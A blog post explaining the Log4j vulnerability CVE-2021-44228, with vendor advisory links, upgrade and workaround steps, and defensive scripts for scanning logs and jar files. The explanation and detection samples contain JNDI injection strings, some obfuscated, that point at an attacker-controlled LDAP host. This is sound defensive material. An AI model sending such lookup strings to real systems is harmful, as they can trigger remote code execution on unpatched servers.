
The much-discussed Log4j vulnerability

by 스쳐가는인연 2021. 12. 23.

Notes from studying the Log4j vulnerability everyone is talking about

CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228

A vulnerability in the Log4j library (Java based) has been reported.
Log4j is a logging library used from Java/Kotlin/Scala/Groovy code: it records a program's log messages and writes them to the configured destination (file, console, and so on) while the program runs.

Java programs can look up Java objects through JNDI, for example from an LDAP directory.

For convenience, Log4j supports a lookup syntax of the form ${prefix:name} that is expanded to the value of a Java object or runtime property when the string is processed.
e.g. ${java:version} > the version of the Java runtime that is currently executing

The vulnerability: Log4j 2 evaluated these lookups inside log messages, including messages built from attacker-supplied input (for example an HTTP header such as User-Agent that the application logs). A logged string of the form ${jndi:ldap://attacker-host/x} makes Log4j perform a JNDI lookup against an LDAP server the attacker controls and load the Java object it returns, which yields remote code execution; malformed lookups can also be used for denial of service.
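To make the lookup abuse concrete from the defender's side, here is an added example (not code from the original post or from Log4j) that scans log lines for JNDI lookups, including the nested-lookup disguises attackers used (${lower:j}, ${::-j}, ${env:NaN:-j}) to slip past a naive search for the literal text "${jndi:". The normaliser is an approximation of Log4j's inside-out substitution that models only the prefixes attackers abuse; the sample access-log lines and the host attacker.example are constructed for the example.

```python
import re

# Innermost ${...} whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A lookup whose prefix is jndi; Log4j matches the prefix case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Approximate Log4j 2's resolution of one innermost lookup.

    Only the pieces attackers use to disguise the string are modelled:
    ${lower:X}, ${upper:X} and the ${name:-default} fallback syntax.
    """
    prefix, sep, rest = body.partition(":")
    p = prefix.strip().lower()
    if p == "jndi":
        # Keep it visible. Log4j runs the lookup before it considers any
        # ":-" default in the body, so a default does not neutralise it.
        return "${" + body + "}"
    if sep and p == "lower":
        return rest.lower()
    if sep and p == "upper":
        return rest.upper()
    if ":-" in body:
        # ${env:NaN:-j} or ${::-j}: unknown key, so the default text is used.
        return body.split(":-", 1)[1]
    # Unknown lookup with no default: Log4j leaves the text as it is.
    return "${" + body + "}"


def normalize_lookups(text: str, max_passes: int = 32) -> str:
    """Expand nested lookups inside-out until the string stops changing."""
    for _ in range(max_passes):
        expanded = _INNER.sub(lambda m: _resolve_inner(m.group(1)), text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed access-log lines (not real traffic); the last field is the User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:${env:NaN:-l}dap://attacker.example/a}"',
    '10.0.0.3 - - "GET /?q=${java:version} HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for n, norm in find_jndi_lookups(SAMPLE_LOG):
        print("line %d: %s" % (n, norm))
```

The last sample line carries a non-JNDI lookup (${java:version}) and is deliberately not flagged by this check; in practice any ${...} arriving in user-controlled input is worth a second look, since the same substitution machinery can leak environment variables or system properties.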

 

According to Apache, only the log4j-core JAR file is affected (the vulnerable code is the JndiLookup class inside it), so an application that uses only the log4j-api JAR without log4j-core is not affected.

 

Each hardware and software vendor appears to be quickly assessing the impact on its own products and preparing countermeasures.

- The advisories are being updated continuously, so the vendor's own security bulletin is the authoritative source for the current status.

 

Note) JNDI stands for Java Naming and Directory Interface, an API added to Java in the late 1990s that lets a Java program look up data (in the form of Java objects) through naming and directory services such as LDAP.


Recommended Action (versions recommended as of this post's date, 2021-12-23):
· Java 8 or later: update to Log4j 2.17.0
· Java 7: update to Log4j 2.12.3
· Java 6: update to Log4j 2.3.1

Workaround Action:
--------------------------------------------------------

Users are advised not to enable JNDI in Log4j 2.16.0. If the JMS Appender is required, use Log4j 2.12.2.

   - Remove the JndiLookup class from the classpath:
      # zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

   - Check whether JMSAppender is in use and, if so, modify or remove that code
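The version check in the Recommended Action and the class-removal workaround are easier to apply across many systems with a small inventory script, which is also how the vendor impact assessments mentioned above are done in practice. The following is an added example (not from the original post, Apache or any vendor): it inspects a jar, including log4j-core jars nested inside WAR/EAR/fat jars, reads the version from log4j-core's Maven pom.properties, reports whether JndiLookup.class is present, and writes a copy without that class, which is what `zip -q -d` does in place. The sample jar it builds is a constructed stand-in holding only metadata and a dummy class entry, and the version floors are the ones this post recommends as of its date; later releases may have moved them.

```python
import io
import os
import tempfile
import zipfile

# Class whose removal is the documented workaround, and the Maven metadata
# file that log4j-core jars carry (used here to read the version).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Version floors recommended on this page (2021-12-23): 2.12.x and 2.3.x are
# the Java 7 and Java 6 branches; everything else should be on 2.17.0.
FLOORS = {(2, 12): (2, 12, 3), (2, 3): (2, 3, 1)}
DEFAULT_FLOOR = (2, 17, 0)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); a suffix such as '-beta9' is ignored."""
    nums = []
    for part in text.split("."):
        digits = ""
        for ch in part:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits) if digits else 0)
    return tuple((nums + [0, 0, 0])[:3])


def below_floor(version):
    """True when a log4j-core version is older than the floor for its branch."""
    v = parse_version(version)
    return v < FLOORS.get(v[:2], DEFAULT_FLOOR)


def _inspect_bytes(data, path, findings):
    """Inspect one jar held in memory and recurse into jars nested inside it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_class = JNDI_CLASS in names
        if version is not None or has_class:
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": has_class,
                # Safe only if the class is gone or the version is at/above the floor.
                "needs_action": has_class and (version is None or below_floor(version)),
            })
        for name in sorted(names):
            if name.endswith((".jar", ".war", ".ear")):
                _inspect_bytes(zf.read(name), path + "!" + name, findings)


def inspect_jar(path):
    """Return one finding per log4j-core jar found at or below `path`."""
    findings = []
    with open(path, "rb") as f:
        _inspect_bytes(f.read(), path, findings)
    return findings


def strip_jndi_lookup(src, dst):
    """Copy src to dst without JndiLookup.class; returns True if the class was removed."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def build_sample_jar(path, version="2.14.1"):
    """Constructed stand-in for log4j-core: metadata plus a dummy JndiLookup.class.

    The class entry holds only the class-file magic number, not real bytecode.
    """
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def demo():
    """Embed the sample jar in a fat jar, inspect it, strip the class, inspect again."""
    with tempfile.TemporaryDirectory() as tmp:
        core = os.path.join(tmp, "log4j-core-2.14.1.jar")
        build_sample_jar(core)
        fat = os.path.join(tmp, "app.jar")
        with zipfile.ZipFile(fat, "w") as zf:
            zf.write(core, "BOOT-INF/lib/log4j-core-2.14.1.jar")
        before = inspect_jar(fat)
        fixed = os.path.join(tmp, "log4j-core-2.14.1-nojndi.jar")
        removed = strip_jndi_lookup(core, fixed)
        return before, removed, inspect_jar(fixed)


if __name__ == "__main__":
    for finding in sum(demo()[::2], []):
        print(finding)
```

On a real host, call inspect_jar() on every *.jar, *.war and *.ear under the application and JVM directories, keep a backup before replacing a jar with the stripped copy, re-inspect the result, and restart the JVM, since a running process keeps the old class loaded.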

 

 

Other workarounds are also still being verified and updated:

In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC). Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.

Other insufficient mitigation measures are: setting system property log4j2.formatMsgNoLookups or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true for releases >= 2.10, or modifying the logging configuration to disable message lookups with %m{nolookups}, %msg{nolookups} or %message{nolookups} for releases >= 2.7 and <= 2.14.1.
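The PatternLayout advice above in configuration form, as an added illustration that is not from the original post or from Apache. It assumes an application that stores the login name in the Thread Context (MDC) under the key "loginId" before logging; the appender names are arbitrary.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Added illustration, not a configuration from the original post. Assumes the
     application puts the login name into the Thread Context (MDC) as "loginId". -->
<Configuration status="WARN">
  <Appenders>
    <!-- Weak: a Context Lookup in the pattern. The MDC value is substituted as a
         lookup expression, so attacker-controlled text that reaches the MDC
         (e.g. a value copied from an HTTP header) is evaluated by Log4j. -->
    <Console name="ConsoleWeak" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{ISO8601} %-5p [%t] user=$${ctx:loginId} %c{1} - %m%n"/>
    </Console>
    <!-- Hardened: the Thread Context Map pattern. %X{loginId} copies the MDC value
         into the output instead of treating it as a lookup expression. -->
    <Console name="ConsoleHardened" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{ISO8601} %-5p [%t] user=%X{loginId} %c{1} - %m%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="ConsoleHardened"/>
    </Root>
  </Loggers>
</Configuration>
```

Treat this as exposure reduction only: the Apache description quoted in the references below states that on 2.15.0 a Thread Context Map pattern (%X, %mdc, %MDC) can still be abused by attacker-controlled MDC data, so upgrading or removing JndiLookup remains required.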
--------------------------------------------------------

 

Note. According to Apache, measures other than upgrading the version or removing the JndiLookup class do not fully mitigate the vulnerability.

The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar.

 


References:
--------------------------------------------------------
Public Vulnerability Website -  Apache Software Log4j
https://www.hpe.com/us/en/services/security-vulnerability.html

Apache Software Log4j (CVE-2021-44228)
https://techhub.hpe.com/eginfolib/securityalerts/Apache%20Software%20Log4j/Apache_Software_Log4j.html

HPESBGN04215 rev.3 - Certain HPE Products using Apache Log4j2, Remote Code Execution
https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04215en_us

Notice: (Revision) Apache Software Log4j - Security Vulnerability CVE-2021-44228
https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-a00120086en_us
--------------------------------------------------------

Re: Is OneView vulnerable to the Apache Software Log4j Vulnerability (CVE-2021-44228)?
https://community.hpe.com/t5/HPE-OneView/Is-OneView-vulnerable-to-the-Apache-Software-Log4j-Vulnerability/m-p/7156431#M6733

ChrisLynch HPE PRO
HPE OneView and OneView Global Dashboard are not vulnerable to the log4j exploit. While both use log4j, it is an older version without the exploit and does not allow an external attacker access to its endpoint (it is restricted to internal authenticated services only).
iLO does not use log4j at all, in any firmware version for any generation of ASIC.

--------------------------------------------------------
Log4j security vulnerability incident (namu.wiki)
https://namu.wiki/w/Log4j%20%EB%B3%B4%EC%95%88%20%EC%B7%A8%EC%95%BD%EC%A0%90%20%EC%82%AC%ED%83%9C#fn-1

Apache Log4j security update advisory (KrCERT)
https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389

Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Description
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property log4j2.formatMsgNoLookups to true do NOT mitigate this specific vulnerability.

Fixed in Log4j 2.12.2 and Log4j 2.16.0

Mitigation
Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.
Please note that Log4j 1.x has reached end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x were not checked and will not be fixed.

Log4j 2.x mitigation: Implement one of the mitigation techniques below.
   Java 8 (or later) users should upgrade to release 2.17.0.
   Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
   Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
   Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.

 

The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar.

Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this.


Log4J-Mitigation-CVE-2021-44228
https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet

Microsoft’s Response to CVE-2021-44228 Apache Log4j 2
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

Apache Log4j 2
https://logging.apache.org/log4j/2.x/download.html

Responding to the log4j vulnerability (tistory)
https://9d4u.tistory.com/m/1313
--------------------------------------------------------

--------------------------------------------------------
Additional Information for Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
https://www.dell.com/support/kbdoc/en-us/000194416/additional-information-for-apache-log4j-remote-code-execution-vulnerability-cve-2021-44228

DSN-2021-007: Dell Response to Apache Log4j Remote Code Execution Vulnerability
https://www.dell.com/support/kbdoc/en-us/000194372/dsn-2021-007-dell-response-to-apache-log4j-remote-code-execution-vulnerability

Dell Response to Apache Log4j Remote Code Execution Vulnerability
https://www.dell.com/support/kbdoc/en-us/000194414/dell-response-to-apache-log4j-remote-code-execution-vulnerability

Security Advisories and Notices
https://www.dell.com/support/security/en-us
--------------------------------------------------------

--------------------------------------------------------
Lenovo - Apache Log4j Vulnerability
https://support.lenovo.com/ca/en/product_security/len-76573

Lenovo Product Security Advisories and Announcements
https://support.lenovo.com/ca/en/product_security/home
--------------------------------------------------------

Log4j overview related software
https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

 

 

 

 

 

 

 
